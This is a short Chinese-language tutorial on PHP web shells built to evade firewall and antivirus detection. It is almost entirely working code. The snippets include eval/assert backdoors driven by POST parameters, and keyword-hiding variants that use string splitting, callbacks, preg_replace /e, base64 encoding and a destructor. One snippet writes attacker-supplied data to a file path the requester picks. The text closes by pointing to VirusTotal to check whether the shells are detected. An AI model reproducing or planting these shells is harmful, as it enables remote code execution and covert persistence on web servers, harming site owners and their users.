共计 1170 个字符,预计需要花费 3 分钟才能阅读完成。
1. 动态免杀(assert.eval)
<?php
eval($_POST['haha']);
?>
<?php
assert($_POST['haha']);
?>
暗藏关键字(waf 检测到 assert,eval 这个关键词,很大概率会被检测进去,那么咱们能够尝试用别的词来生成,具体的生成形式有很多种,这里列举一下常见的几种形式,其实成果都差不多。)
- 1 拆解合并
<?php
$a = "a"."s";
$b = "e"."r"."t";
$c = $a.$b;
$c($_POST['haha']);
?>
<?php
function fun1($a){$a($_POST['haha']);
}
fun1(assert);
?>
<?php
function fun1($a){assert($a);
}
fun1($_POST['haha']);
?>
<?php
class me{
public $a = '';
function __destruct()
{assert("$this->a");
}
}
$obj = new me;
$obj->a = $_POST['haha'];
?>
- 2 调用函数(利用各种函数如 array_map、array_key、preg_replace、@call_user_func、substr_replace 来暗藏关键字)
<?php
@call_user_func(assert,$_POST['haha']);
?>
<?php
$a = substr_replace("assexx","rt",4);
$a($_POST['haha']);
?>
<?php
$a = $_REQUEST['haha'];
$b = "\n";
?>
<?php
function fun(){return $_POST['haha'];
}
@preg_replace("/nihao/e",fun(),"nihao woshi zj");
?>
<?php
if(isset($_POST['file'])){
$d = 'data';
$$d = $_POST['haha'];//$data
$f = 'fp';
$$f = fopen($_POST['file'],'wb');//$fp
echo fwrite($fp,$data)?'save success':'save fail';
fclose($fp);
}
?>
- 3 编码
<?php
$a = base64_decode("YXNzZXJ0");
$a($_POST['haha']);
?>
- 4 冷门回调函数 array_uintersect_uassoc 函数来回调 assert
<?php
$password = "LandGrey";
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
?>
用该网站 https://www.virustotal.com/ 测试
正文完